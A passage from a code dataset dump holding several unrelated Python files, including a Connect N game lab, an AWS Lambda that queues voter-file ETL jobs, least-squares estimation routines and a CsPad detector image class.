lst2,\n # then return that element from lst1 (in form of list) plus a recursive call excluding that element\n elif lst1[0] < lst2[0]:\n return [lst1[0]] + merge(lst1[1:], lst2)\n # Recursive case 2: similar to recursive case 1, but this time if the first element of lst2 is smaller than that of lst1\n else:\n return [lst2[0]] + merge(lst1, lst2[1:])\n \n \n\n######################\n### Connect N Game ###\n######################\n\ndef create_row(size):\n \"\"\"Returns a single, empty row with the given size. 
Each empty spot is\n represented by the string '-'.\n\n >>> create_row(5)\n ['-', '-', '-', '-', '-']\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n # Straightforward implementation using list comprehension\n return ['-' for i in range(size)]\n\n\ndef create_board(rows, columns):\n \"\"\"Returns a board with the given dimensions.\n\n >>> create_board(3, 5)\n [['-', '-', '-', '-', '-'], ['-', '-', '-', '-', '-'], ['-', '-', '-', '-', '-']]\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n # Also straightforward, make use of the create_row function\n return [create_row(columns) for i in range(rows)]\n\n\ndef replace_elem(lst, index, elem):\n \"\"\"Create and return a new list whose elements are the same as those in\n LST except at index INDEX, which should contain element ELEM instead.\n\n >>> old = [1, 2, 3, 4, 5, 6, 7]\n >>> new = replace_elem(old, 2, 8)\n >>> new\n [1, 2, 8, 4, 5, 6, 7]\n >>> new is old # check that replace_elem outputs a new list\n False\n \"\"\"\n assert index >= 0 and index < len(lst), 'Index is out of bounds'\n \"*** YOUR CODE HERE ***\"\n return lst[:index] + [elem] + lst[index+1:]\n\n\ndef get_piece(board, row, column):\n \"\"\"Returns the piece at location (row, column) in the board.\n\n >>> rows, columns = 2, 2\n >>> board = create_board(rows, columns)\n >>> board = put_piece(board, rows, 0, 'X')[1] # Puts piece \"X\" in column 0 of board and updates board\n >>> board = put_piece(board, rows, 0, 'O')[1] # Puts piece \"O\" in column 0 of board and updates board\n >>> get_piece(board, 1, 0)\n 'X'\n >>> get_piece(board, 1, 1)\n '-'\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n return board[row][column]\n\n\ndef put_piece(board, max_rows, column, player):\n \"\"\"Puts PLAYER's piece in the bottommost empty spot in the given column of\n the board. Returns a tuple of two elements:\n\n 1. The index of the row the piece ends up in, or -1 if the column\n is full.\n 2. The new board\n\n >>> rows, columns = 2, 2\n >>> board = create_board(rows, columns)\n >>> row, new_board = put_piece(board, rows, 0, 'X')\n >>> row\n 1\n >>> row, new_board = put_piece(new_board, rows, 0, 'O')\n >>> row\n 0\n >>> row, new_board = put_piece(new_board, rows, 0, 'X')\n >>> row\n -1\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n # Initiate the currently selected row\n row_i = max_rows - 1\n # Climb up the rows until Python reaches the first bottom-most empty spot. If Python can't find empty spot, row_i would be kept decrementing until\n # it reaches -1\n while row_i >= 0 and get_piece(board, row_i, column) != '-':\n row_i -= 1\n # After climbing all the way up, if the currently selected row is not a negative number, use replace-elem to put the 'O' or 'X' piece\n if row_i >= 0:\n # Create a new row where the index is the column\n new_row = replace_elem(board[row_i], column, player)\n # Create a new board incorporating the new_row above. The index is the currently selected row\n new_board = replace_elem(board, row_i, new_row)\n board = new_board\n return (row_i, board)\n\n\ndef make_move(board, max_rows, max_cols, col, player):\n \"\"\"Put player's piece in column COL of the board, if it is a valid move.\n Return a tuple of two values:\n\n 1. If the move is valid, make_move returns the index of the row the\n piece is placed in. Otherwise, it returns -1.\n 2. 
The updated board\n\n    >>> rows, columns = 2, 2\n    >>> board = create_board(rows, columns)\n    >>> row, board = make_move(board, rows, columns, 0, 'X')\n    >>> row\n    1\n    >>> get_piece(board, 1, 0)\n    'X'\n    >>> row, board = make_move(board, rows, columns, 0, 'O')\n    >>> row\n    0\n    >>> row, board = make_move(board, rows, columns, 0, 'X')\n    >>> row\n    -1\n    >>> row, board = make_move(board, rows, columns, -4, 'O')\n    >>> row\n    -1\n    \"\"\"\n    \"*** YOUR CODE HERE ***\"\n    # Very similar to the put_piece function, except that make_move may be given an invalid column index.\n    # Valid columns run from 0 to max_cols - 1, so reject anything outside that range.\n    if col >= 0 and col < max_cols:\n        return put_piece(board, max_rows, col, player)\n    else:\n        return (-1, board)\n\ndef print_board(board, max_rows, max_cols):\n    \"\"\"Prints the board. Row 0 is at the top, and column 0 at the far left.\n\n    >>> rows, columns = 2, 2\n    >>> board = create_board(rows, columns)\n    >>> print_board(board, rows, columns)\n    - -\n    - -\n    >>> new_board = make_move(board, rows, columns, 0, 'X')[1]\n    >>> print_board(new_board, rows, columns)\n    - -\n    X -\n    \"\"\"\n    \"*** YOUR CODE HERE ***\"\n    # Iterate through the rows, starting with row 0\n    for row in range(max_rows):\n        # row_str stores the string of pieces so far\n        row_str = ''\n        # iterate through the columns, starting with column 0\n        for col in range(max_cols):\n            # Use the get_piece function to obtain each piece, adding a whitespace in the end\n            row_str += get_piece(board, row, col) + ' '\n        # The outcome of row_str has an extra space at the end. We can get rid of it using .strip()\n        print(row_str.strip())\n    \n\ndef check_win_row(board, max_rows, max_cols, num_connect, row, player):\n    \"\"\" Returns True if the given player has a horizontal win\n    in the given row, and otherwise False.\n\n    >>> rows, columns, num_connect = 4, 4, 2\n    >>> board = create_board(rows, columns)\n    >>> board = make_move(board, rows, columns, 0, 'X')[1]\n    >>> board = make_move(board, rows, columns, 0, 'O')[1]\n    >>> check_win_row(board, rows, columns, num_connect, 3, 'O')\n    False\n    >>> board = make_move(board, rows, columns, 2, 'X')[1]\n    >>> board = make_move(board, rows, columns, 0, 'O')[1]\n    >>> check_win_row(board, rows, columns, num_connect, 3, 'X')\n    False\n    >>> board = make_move(board, rows, columns, 1, 'X')[1]\n    >>> check_win_row(board, rows, columns, num_connect, 3, 'X')\n    True\n    >>> check_win_row(board, rows, columns, 4, 3, 'X') # A win depends on the value of num_connect\n    False\n    >>> check_win_row(board, rows, columns, num_connect, 3, 'O') # We only detect wins for the given player\n    False\n    \"\"\"\n    \"*** YOUR CODE HERE ***\"\n    count = 0 # Counts the number of pieces that are the same as player so far\n    for col in range(max_cols):\n        # For every column selected in a row, if the piece is the same as player, increment count\n        if get_piece(board, row, col) == player:\n            count += 1\n            # Then if the count is the same or greater than num_connect, then the winning condition is fulfilled\n            if count >= num_connect:\n                return True\n        # If the piece selected is not the same as player, reset the count\n        else:\n            count = 0\n    return False\n\ndef check_win_column(board, max_rows, max_cols, num_connect, col, player):\n    \"\"\" Returns True if the given player has a vertical win in the given column,\n    and otherwise False.\n\n    >>> rows, columns, num_connect = 5, 5, 2\n    >>> board = create_board(rows, columns)\n    >>> board = make_move(board, rows, columns, 0, 'X')[1]\n    >>> board = make_move(board, rows, columns, 1, 'O')[1]\n    >>> check_win_column(board, rows, columns, num_connect, 0, 'X')\n    False\n    >>> 
board = make_move(board, rows, columns, 1, 'X')[1]\n >>> board = make_move(board, rows, columns, 1, 'O')[1]\n >>> check_win_column(board, rows, columns, num_connect, 1, 'O')\n False\n >>> board = make_move(board, rows, columns, 2, 'X')[1]\n >>> board = make_move(board, rows, columns, 1, 'O')[1]\n >>> check_win_column(board, rows, columns, num_connect, 1, 'O')\n True\n >>> check_win_column(board, rows, columns, 4, 1, 'O')\n False\n >>> check_win_column(board, rows, columns, num_connect, 1, 'X')\n False\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n # Same implementation as check_win_row, but this time we vary the rows\n count = 0\n for row in range(max_rows):\n if get_piece(board, row, col) == player:\n count += 1\n if count >= num_connect:\n return True\n else:\n count = 0\n return False\n\ndef check_win(board, max_rows, max_cols, num_connect, row, col, player):\n \"\"\"Returns True if the given player has any kind of win passing through \n (row, col), and False otherwise.\n\n >>> rows, columns, num_connect = 2, 2, 2\n >>> board = create_board(rows, columns)\n >>> board = make_move(board, rows, columns, 0, 'X')[1]\n >>> board = make_move(board, rows, columns, 1, 'O')[1]\n >>> board = make_move(board, rows, columns, 0, 'X')[1]\n >>> check_win(board, rows, columns, num_connect, 0, 0, 'O')\n False\n >>> check_win(board, rows, columns, num_connect, 0, 0, 'X')\n True\n\n >>> board = create_board(rows, columns)\n >>> board = make_move(board, rows, columns, 0, 'X')[1]\n >>> board = make_move(board, rows, columns, 0, 'O')[1]\n >>> board = make_move(board, rows, columns, 1, 'X')[1]\n >>> check_win(board, rows, columns, num_connect, 1, 0, 'X')\n True\n >>> check_win(board, rows, columns, num_connect, 0, 0, 'X')\n False\n\n >>> board = create_board(rows, columns)\n >>> board = make_move(board, rows, columns, 0, 'X')[1]\n >>> board = make_move(board, rows, columns, 1, 'O')[1]\n >>> board = make_move(board, rows, columns, 1, 'X')[1]\n >>> check_win(board, rows, columns, num_connect, 0, 0, 'X')\n False\n >>> check_win(board, rows, columns, num_connect, 1, 0, 'X')\n True\n \"\"\"\n diagonal_win = check_win_diagonal(board, max_rows, max_cols, num_connect,\n row, col, player)\n \"*** YOUR CODE HERE ***\"\n return diagonal_win or \\\n check_win_row(board, max_rows, max_cols,num_connect, row, player) or \\\n check_win_column(board, max_rows, max_cols, num_connect, col, player)\n\n\n###############################################################\n### Functions for reference when solving the other problems ###\n###############################################################\n\ndef check_win_diagonal(board, max_rows, max_cols, num_connect, row, col, player):\n \"\"\" Returns True if the given player has a diagonal win passing the spot\n (row, column), and False otherwise.\n \"\"\"\n # Find top left of diagonal passing through (row, col).\n adjacent = 0\n row_top_left, col_top_left = row, col\n while row_top_left > 0 and col_top_left > 0:\n row_top_left -= 1\n col_top_left -= 1\n\n # Loop through top left to bottom right diagonal and check for win.\n while row_top_left < max_rows and col_top_left < max_cols:\n piece = get_piece(board, row_top_left, col_top_left)\n if piece == player:\n adjacent += 1\n else:\n adjacent = 0\n if adjacent >= num_connect:\n return True\n row_top_left += 1\n col_top_left += 1\n\n # Find top right of diagonal passing through (row, col).\n adjacent = 0\n row_top_right, col_top_right = row, col\n while row_top_right > 0 and col_top_right < max_cols - 1:\n row_top_right -= 1\n col_top_right += 
1\n\n # Loop through top right to bottom left diagonal and check for win.\n while row_top_right < max_rows and col_top_right >= 0:\n piece = get_piece(board, row_top_right, col_top_right)\n if piece == player:\n adjacent += 1\n else:\n adjacent = 0\n if adjacent >= num_connect:\n return True\n row_top_right += 1\n col_top_right -= 1\n\n return False\n\n#####################################################################################\n### You do not need to read or understand the following code for this assignment. ###\n#####################################################################################\n\nimport sys\n\ndef other(player):\n \"\"\" Returns the given player's opponent.\n \"\"\"\n if player == 'X':\n return 'O'\n return 'X'\n\ndef play(board, max_rows, max_cols, num_connect):\n max_turns = max_rows * max_cols\n playing = True\n print(\"Player 'X' starts\")\n who = 'X'\n turns = 0\n\n while True:\n turns += 1\n if turns > max_turns:\n print(\"No more moves. It's a tie!\")\n sys.exit()\n\n while True:\n try:\n col_index = int(input('Which column, player {}? '.format(who)))\n except ValueError as e:\n print('Invalid input. Please try again.')\n continue\n\n row_index, board = make_move(board, max_rows, max_cols, col_index, who)\n\n if row_index != -1:\n break\n\n print(\"Oops, you can't put a piece there\")\n\n print_board(board, max_rows, max_cols)\n\n if check_win(board, max_rows, max_cols, num_connect, row_index, col_index, who):\n print(\"Player {} wins!\".format(who))\n sys.exit()\n\n who = other(who)\n\ndef start_game():\n # Get all parameters for the game from user.\n while True:\n # Get num_connect from user.\n while True:\n try:\n num_connect = int(input('How many to connect (e.g. 4 for Connect 4)? '))\n except ValueError as e:\n print('Invalid input. Please try again.')\n continue\n break\n\n # Get number of rows for board from user.\n while True:\n try:\n max_rows = int(input('How many rows? '))\n except ValueError as e:\n print('Invalid input. Please try again.')\n continue\n break\n\n # Get number of columns for board from user.\n while True:\n try:\n max_cols = int(input('How many columns? '))\n except ValueError as e:\n print('Invalid input. Please try again.')\n continue\n break\n\n if max_rows >= num_connect or max_cols >= num_connect:\n break\n print(\"Invalid dimensions for connect {0}. 
Please try again.\".format(num_connect))\n\n board = create_board(max_rows, max_cols)\n play(board, max_rows, max_cols, num_connect)","sub_path":"Lab/lab04/lab04_extra.py","file_name":"lab04_extra.py","file_ext":"py","file_size_in_byte":15981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"569931155","text":"#!/usr/bin/env python3\n\nimport simplejson as json\nfrom collections import OrderedDict\n\nclass Json():\n __jsonData = None\n def __init__(self, filename = False):\n if filename != False:\n try:\n jsonfile = open(filename)\n js = json.loads(jsonfile.read())\n sort = (sorted(js.items(), key=lambda x: x[0]))\n self.__jsonData = sort\n print(sort)\n jsonfile.close()\n except FileNotFoundError:\n print(\"Json File not found!\")\n except Exception as e:\n print(\"Exception handling Json file\")\n print(repr(e))\n \n\n def fetch(self):\n return self.__jsonData\n\n def savestate(self, data, filename):\n try:\n file_h = open(filename, 'w')\n file_h.write(json.dumps(data, sort_keys=True))\n except Exception as e:\n print(\"Something went wrong in the json.savestate method\")\n\n","sub_path":"healthi/handler/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"486509481","text":"#!/usr/bin/env python\n# Copyright (C) 2015-2016 Hewlett Packard Enterprise Development LP\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom opsvalidator.base import BaseValidator\nfrom opsvalidator import error\nfrom opsvalidator.error import ValidationError\n\nimport qos_utils\n\n#\n# REST Custom Validator for QoS for the QoS DSCP Map Entry table.\n#\n\n\nclass QosDscpMapEntryValidator(BaseValidator):\n resource = \"qos_dscp_map_entry\"\n\n #\n # Validates that the given modification to a given row is allowed.\n #\n def validate_modification(self, validation_args):\n if validation_args.is_new:\n details = \"DSCP Map Entries cannot be created.\"\n raise ValidationError(error.VERIFICATION_FAILED, details)\n\n qos_dscp_map_entry_row = validation_args.resource_row\n self.validate_dscp_map_description_contains_valid_chars(\n qos_dscp_map_entry_row)\n\n # Cos (priority_code_point) is not supported for dill.\n self.validate_priority_code_point_is_empty(\n qos_dscp_map_entry_row)\n\n #\n # Validates that the given deletion of a given row is allowed.\n #\n def validate_deletion(self, validation_args):\n details = \"DSCP Map Entries cannot be deleted.\"\n raise ValidationError(error.VERIFICATION_FAILED, details)\n\n #\n # Validates that the dscp map description contains valid characters.\n #\n def validate_dscp_map_description_contains_valid_chars(\n self, qos_dscp_map_entry_row):\n if qos_dscp_map_entry_row.description is None:\n return\n\n description = qos_dscp_map_entry_row.description[0]\n qos_utils.validate_string_contains_valid_chars(description)\n\n #\n # Validates that the priority_code_point field is empty, since it is\n # not supported for dill.\n #\n def validate_priority_code_point_is_empty(\n self, qos_dscp_map_entry_row):\n # Cos (priority_code_point) is not supported for dill.\n if qos_dscp_map_entry_row.priority_code_point != []:\n details = \"The priority_code_point field \" + \\\n \"is not currently supported.\"\n raise ValidationError(error.VERIFICATION_FAILED, details)\n","sub_path":"ops/opsplugins/qos/qos_dscp_map_entry.py","file_name":"qos_dscp_map_entry.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"14236743","text":"from itertools import product\n\n\ndef iscomp(n):\n for i in range(2, 10000):\n if not n % i:\n return i\n return False\n\n\ninput()\nresult = []\nn, j = map(int, input().split())\nfor ii, coin in enumerate(product(\"01\", repeat=n-2)):\n coin = \"1\" + \"\".join(coin) + \"1\"\n # if ii % 1 == 0:\n # print(\"\\t\", ii, coin)\n divs = []\n for i in range(2, 11):\n m = int(coin, i)\n divs.append(iscomp(m))\n if not divs[-1]:\n break\n else:\n # print(coin)\n result.append((coin, divs))\n if len(result) == j:\n break\nprint(\"Case #1:\")\nfor c, divs in result:\n print(c, \" \".join(map(str, divs)))\n","sub_path":"solutions_5738606668808192_1/Python/MaksK/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"466442506","text":"from __future__ import print_function\nimport boto3\nimport urllib.parse\nimport re\nimport os.path\n\n\nreporter_dict = {\n \"WA\": \"1\",\n \"OH\": \"2\",\n \"NY\": \"3\",\n \"FL\": \"4\",\n \"MI\": \"5\"\n}\n\n\ndef submit_file_copy_job(client, bucket, key):\n s3_path = \"s3://%s/%s\" % (bucket, key)\n command = {\"command\": [\"sh\", \"-cxv\", \"aws s3 cp %s /work; chmod go+rw /work/%s\" % (s3_path, key)]}\n\n job_submit_result = 
client.submit_job(jobName='CopyVoterFile', jobQueue='National-Voter-File-Job-Queue',\n jobDefinition='S3Ops', containerOverrides=command)\n\n job_id = job_submit_result['jobId']\n return job_id\n\n\ndef submit_unzip_job(client, input_file, extension, dependsOn):\n\n if extension == '.gz':\n command = {\"command\": [\"sh\", \"-cxv\", \"gunzip -f \"+input_file]}\n elif extension == '.zip':\n command = {\"command\": [\"sh\", \"-cxv\", \"unzip -f \"+input_file]}\n else:\n raise Exception(\"Unrecognized compressed file extension: \"+extension)\n\n job_submit_result = client.submit_job(jobName='UnzipVoterFile', jobQueue='National-Voter-File-Job-Queue',dependsOn=dependsOn,\n jobDefinition='BusyBox', containerOverrides=command)\n\n job_id = job_submit_result['jobId']\n return job_id\n\n\ndef submit_transform_job(batch_client, input_file, state_name, dependsOn):\n xform_command = {\"command\": [\"--configfile\", \"/work/load_conf.json\", \"-s\", state_name, \"--input_file\",\n input_file, \"transform\"]}\n\n job_submit_result = batch_client.submit_job(jobName='Transform' + state_name,\n jobQueue='National-Voter-File-Job-Queue',\n jobDefinition='ETL', dependsOn=dependsOn,\n containerOverrides=xform_command)\n return job_submit_result['jobId']\n\n\ndef submit_precinct_job(batch_client, input_file, state_name, report_date, dependsOn):\n xform_command = {\n \"command\": [\"--configfile\", \"/work/load_conf.json\", \"--update_jndi\", \"--report_date\", report_date, \"-s\",\n state_name, \"--input_file\",\n input_file, \"precincts\"]}\n\n job_submit_result = batch_client.submit_job(jobName='LoadPrecincts' + state_name + report_date,\n jobQueue='National-Voter-File-Job-Queue',\n jobDefinition='ETL', dependsOn=dependsOn,\n containerOverrides=xform_command)\n return job_submit_result['jobId']\n\n\ndef submit_load_job(batch_client, input_file, state_name, report_date, reporter, dependsOn):\n xform_command = {\"command\": [\"--configfile\", \"/work/load_conf.json\", \"--update_jndi\", \"--report_date\", report_date,\n \"--reporter_key\", reporter, \"-s\", state_name, \"--input_file\",\n input_file, \"load\"]}\n\n job_submit_result = batch_client.submit_job(jobName='LoadVoterFile' + state_name + report_date,\n jobQueue='National-Voter-File-Job-Queue',\n jobDefinition='ETL', dependsOn=dependsOn,\n containerOverrides=xform_command)\n return job_submit_result['jobId']\n\n\ndef submit_vote_history_job(batch_client, input_file, state_name, report_date, reporter, dependsOn):\n xform_command = {\"command\": [\"--configfile\", \"/work/load_conf.json\", \"--update_jndi\", \"--report_date\", report_date,\n \"--reporter_key\", reporter, \"-s\", state_name, \"--input_file\",\n input_file, \"history\"]}\n\n job_submit_result = batch_client.submit_job(jobName='LoadVoterHistory' + state_name + report_date,\n jobQueue='National-Voter-File-Job-Queue',\n jobDefinition='ETL', dependsOn=dependsOn,\n containerOverrides=xform_command)\n return job_submit_result['jobId']\n\ndef lambda_handler(event, context):\n batch_client = boto3.client('batch')\n \"\"\":type: pyboto3.batch\"\"\"\n\n s3 = boto3.resource('s3')\n\n # Extract the bucket name and object name\n bucket = event['Records'][0]['s3']['bucket']['name']\n key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'])\n\n # Determine the state associated with this bucket\n bucket_tagging = s3.BucketTagging(bucket)\n state_tags = [el for el in bucket_tagging.tag_set if el['Key'] == 'state_name']\n state_name = state_tags[0]['Value']\n\n reporter = 
reporter_dict[state_name]\n\n # Extract the file date\n m = re.search(\"_([0-9]{4})([0-9]{2})([0-9]{2}).*\", key)\n if not m:\n raise Exception(\"Can't determine file date from \" + key)\n\n report_date = \"%s-%s-%s\" % (m.group(1), m.group(2), m.group(3))\n\n print(\"Processing file for \" + state_name + \" on \" + report_date)\n\n # Copy the file from S3 to our local EFS mount\n cp_job = submit_file_copy_job(batch_client, bucket, key)\n print(\"cp job is \" + cp_job)\n\n input_file = \"/work/\" + key\n\n # Unzip the file once it is copied (if necessary); the decompressed\n # file keeps the original name minus the archive extension\n (base_file, extension) = os.path.splitext(input_file)\n if extension == '.gz' or extension == '.zip':\n file_ready_job = submit_unzip_job(batch_client, input_file, extension, [{'jobId': cp_job}])\n input_file = base_file\n else:\n file_ready_job = cp_job\n\n # Schedule a transform job after that\n transform_job = submit_transform_job(batch_client, input_file, state_name, [{'jobId': file_ready_job}])\n\n # The precinct job can run in parallel\n precinct_job = submit_precinct_job(batch_client, input_file, state_name, report_date, [{'jobId': file_ready_job}])\n\n # The load job needs the transform and the precincts\n load_job = submit_load_job(batch_client, \"/work/\" + state_name.lower() + \"_output.csv\", state_name, report_date,\n reporter, [{'jobId': transform_job}, {'jobId': precinct_job}])\n","sub_path":"python/s3Job.py","file_name":"s3Job.py","file_ext":"py","file_size_in_byte":6339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"426187810","text":"from django.contrib import admin\nfrom models import *\n\nfrom perception.actions import export_as_xls\n\nadmin.site.register(Camera)\n\n\nclass MotionAdmin(admin.ModelAdmin):\n list_filter = ['camera']\n\nclass VolumeAdmin(admin.ModelAdmin):\n list_filter = ['camera']\n\nadmin.site.register(Volume, VolumeAdmin)\nadmin.site.register(Motion, MotionAdmin)\n\n\n\nclass MyAdmin(admin.ModelAdmin):\n actions = [export_as_xls]\n\nadmin.site.add_action(export_as_xls)","sub_path":"perception/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"39657568","text":"import numpy as np\nimport scipy as sp\nimport matplotlib.pyplot as plt\n\ndef extractTrainingSet(G):\n Phi = np.zeros((len(G), len(G[0][0])))\n Y = np.zeros((len(G),len(G[0][1])))\n for i in range(len(G)):\n Phi[i] = G[i][0]\n Y[i] = G[i][1]\n return Phi, Y\n\ndef bls(Phi, Y): #batchLeastSquares\n \"\"\"performs batch least squares on the training data (Phi, Y)\"\"\"\n PTP = np.dot(Phi.T,Phi)\n PTY = np.dot(Phi.T,Y)\n return np.dot(np.linalg.inv(PTP),PTY)\n\ndef wbls(Phi, Y, W): #weightedBatchLeastSquares\n \"\"\"Weighted Batch Least Squares\"\"\"\n #TODO: get dim M and throw error if W is not MxM\n PTWP = np.dot(Phi.T, np.dot(W, Phi))\n PTWY = np.dot(Phi.T, np.dot(W, Y))\n return np.dot(np.linalg.inv(PTWP), PTWY)\n\ndef rls(Phi, Y, alpha=2000, NRLS=20):\n \"\"\"Recursive Least Squares\"\"\"\n M = Phi.shape[0]\n N = Phi.shape[1]\n \n # initialize thetahat and P\n thetahat = np.zeros(N)\n P = alpha * np.identity(N)\n for i in range(M * NRLS):\n x = Phi[i%M, :]\n y = Y[i%M]\n c = 1 + np.dot(x.T, np.dot(P, x))\n Px = np.dot(P, x)\n P = np.dot(np.identity(N) - (np.outer(Px, x.T) / c), P)\n diff = y - np.dot(x.T, 
thetahat)\n #FIXME: this line works only because y is a scalar\n thetahat = thetahat + np.dot(P, x) * diff\n return thetahat\n\ndef wrls(Phi, Y, alpha=2000, forget_factor=1, NRLS=20):\n \"\"\"Weighted Recursive Least Squares\"\"\"\n M = Phi.shape[0]\n N = Phi.shape[1]\n \n # initialize thetahat and P\n thetahat = np.zeros(N)\n P = alpha * np.identity(N)\n for i in range(M * NRLS):\n x = Phi[i%M, :]\n y = Y[i%M]\n c = forget_factor * 1 + np.dot(x.T, np.dot(P, x))\n Px = np.dot(P, x)\n P = np.dot(np.identity(N) - (np.outer(Px, x.T) / c), P)\n P = P / forget_factor\n diff = y - np.dot(x.T, thetahat)\n #FIXME: this line works only because y is a scalar\n thetahat = thetahat + np.dot(P, x) * diff\n return thetahat\n\ndef xsiFuzzyGauss(x, centers, spreads):\n R = centers.shape[0]\n n = centers.shape[1]\n xsi = np.zeros(x.shape)\n den = 0\n for i in range(R):\n prod = 1\n for j in range(n):\n prod *= np.exp(-0.5 * ((x[j] - centers[i][j]) / spreads[i][j]) ** 2)\n den += prod\n for i in range(R):\n num = 1\n for j in range(n):\n num *= np.exp(-0.5 * ((x[j] - centers[i][j]) / spreads[i][j]) ** 2)\n xsi[i] = num / den\n return xsi\n\ndef fuzzyGaussBLS(X, C, S, Y):\n Phi = np.zeros(X.shape)\n for i in range(X.shape[0]):\n Phi[i,:] = xsiFuzzyGauss(X[i,:], C, S)\n return bls(Phi, Y)\n \ndef calcUcrisp(x, b, C, S):\n num = 0\n den = 0\n for i in range(C.shape[0]):\n prod = 1\n for j in range(C.shape[1]):\n prod *= np.exp(-0.5 * ((x[j] - C[i][j]) / S[i][j]) ** 2)\n num += b[i] * prod\n den += prod\n return num / den\n\ndef fuzzyGaussRLS(X, C, S, Y):\n Phi = np.zeros(X.shape)\n for i in range(X.shape[0]):\n Phi[i,:] = xsiFuzzyGauss(X[i,:], C, S)\n return rls(Phi, Y)\n \n \nif __name__ == '__main__':\n G = [[[1.,1.],[1.]],[[2.,1.],[1.]],[[3.,1.],[3.]]]\n Phi, Y = extractTrainingSet(G)\n \n # Test bls and rls\n thetaHat = bls(Phi, Y)\n print(thetaHat)\n thetaHat2 = rls(Phi, Y)\n thetaHat3 = wrls(Phi, Y, alpha=100, forget_factor=0.9)\n print(thetaHat2)\n\n # Test fuzzyGaussBLS\n X = np.array([[0.,2.],[2.,4.],[3.,6.]])\n #C = X[:2, :]\n C = np.array([[1.5,3.],[3.,5.]])\n #print(C)\n S = 2 * np.ones((2,2))\n Y = [1.,5.,6.]\n theta = fuzzyGaussBLS(X, C, S, Y)\n #print(theta)\n for i in range(X.shape[0]):\n print(calcUcrisp(X[i,:], theta, C, S))\n\n X2 = np.array([[1,2],[2.5,5],[4,7]])\n for i in range(X2.shape[0]):\n print(calcUcrisp(X2[i,:], theta, C, S))\n\n # Test fuzzyGaussRLS\n theta2 = fuzzyGaussRLS(X, C, S, Y)\n print(theta2)\n for i in range(X.shape[0]):\n print(calcUcrisp(X[i,:], theta2, C, S))\n\n for i in range(X2.shape[0]):\n print(calcUcrisp(X2[i,:], theta2, C, S))\n\n\n\n\n\n\n\n","sub_path":"est-and-id/least-squares.py","file_name":"least-squares.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"401255468","text":"\n\nfrom xai.brain.wordbase.nouns._recitation import _RECITATION\n\n#class header\nclass _RECITATIONS(_RECITATION, ):\n\tdef __init__(self,): \n\t\t_RECITATION.__init__(self)\n\t\tself.name = \"RECITATIONS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"recitation\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_recitations.py","file_name":"_recitations.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"123377226","text":"import logging\nlog = logging.getLogger(\"drc host\")\nlog.DEBUG = logging.DEBUG\nlog.INFO = logging.INFO\nlog._fmt 
= logging.Formatter('%(relativeCreated)09d | %(levelname)s | %(target)s | %(message)s')\nlog.HST = {\"target\": \"HST\"}\nlog.BBB = {\"target\": \"BBB\"}\nlogHandler = logging.StreamHandler()\nlogHandler.setFormatter(log._fmt)\nlog.addHandler(logHandler)\nlog.setLevel(log.DEBUG)\nlogHandler.setLevel(log.DEBUG)\n","sub_path":"host/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"17984711","text":"import numpy as np\n\nclass CsPad( object ):\n\n npix_quad = 850\n \n # origin of section in quad coordinate system\n #\n # x-position correspond to column number\n xpos_sec2x1 = [[ 414, 626, 0, 0, 213, 1, 418, 419], # 2:5 were not measured\n [ 421, 634, 0, 0, 213, 1, 424, 425],\n [ 417, 630, 0, 1, 212, 0, 425, 426],\n [ 416, 630, 0, 0, 213, 1, 420, 421]] # 2:5 were not measured\n # y-position correspond to maxrows - row number \n ypos_sec2x1 = [[ 0, 0, 214, 1, 425, 425, 615, 402], # 2:5 were not measured\n [ 0, 0, 214, 1, 425, 425, 615, 402],\n [ 0, 0, 215, 3, 431, 431, 616, 403],\n [ 0, 0, 214, 1, 425, 425, 615, 403]] # 2:5 were not measured\n \n\n def __init__(self, config):\n quads = range(4)\n self.sections = map(config.sections, quads)\n pass\n\n def CsPadElement( self, data3d, qn ):\n # Construct one image for each quadrant, each with 8 sections\n # from a data3d = 3 x 2*194 x 185 data array\n # +---+---+-------+\n # | | | 6 |\n # + 5 | 4 +-------+\n # | | | 7 |\n # +---+---+---+---+\n # | 2 | | |\n # +-------+ 0 | 1 |\n # | 3 | | |\n # +-------+---+---+\n\n # min and max\n #print \"CsPad (min,max) for quad %d: (%d,%d)\" % (qn,np.min(data3d),np.max(data3d))\n\n\n # if any sections are missing, insert zeros\n if len( data3d ) < 8 :\n zsec = np.zeros( (185,388), dtype=data3d.dtype)\n #zsec = zsec * -99\n for i in range (8) :\n if i not in self.sections[qn] :\n data3d = np.insert( data3d, i, zsec, axis=0 )\n\n pairs = []\n for i in range (8) :\n \n # insert gap between asics in the 2x1\n asics = np.hsplit( 